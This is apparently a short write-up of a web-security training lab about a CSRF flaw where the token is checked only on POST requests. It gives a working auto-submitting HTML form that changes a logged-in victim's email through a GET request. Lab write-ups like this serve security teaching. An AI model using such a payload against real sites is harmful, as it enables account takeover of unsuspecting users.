CSRF where token validation depends on request method | Practitioner
Upon viewing the page source, the form correctly asks for the CSRF token when the request uses the POST method. But the one for GET is nowhere to be found.

We can just change our existing payload to use GET instead of POST as follow:
<html>
<body>
<form action="https://<lab-id>.web-security-academy.net/my-account/change-email" method="GET" id="attack">
<input type="hidden" name="email" value="super-ultimate-hacker@leet-hacker.net">
</form>
<script>
document.getElementById("attack").submit();
</script>
</body>
</html>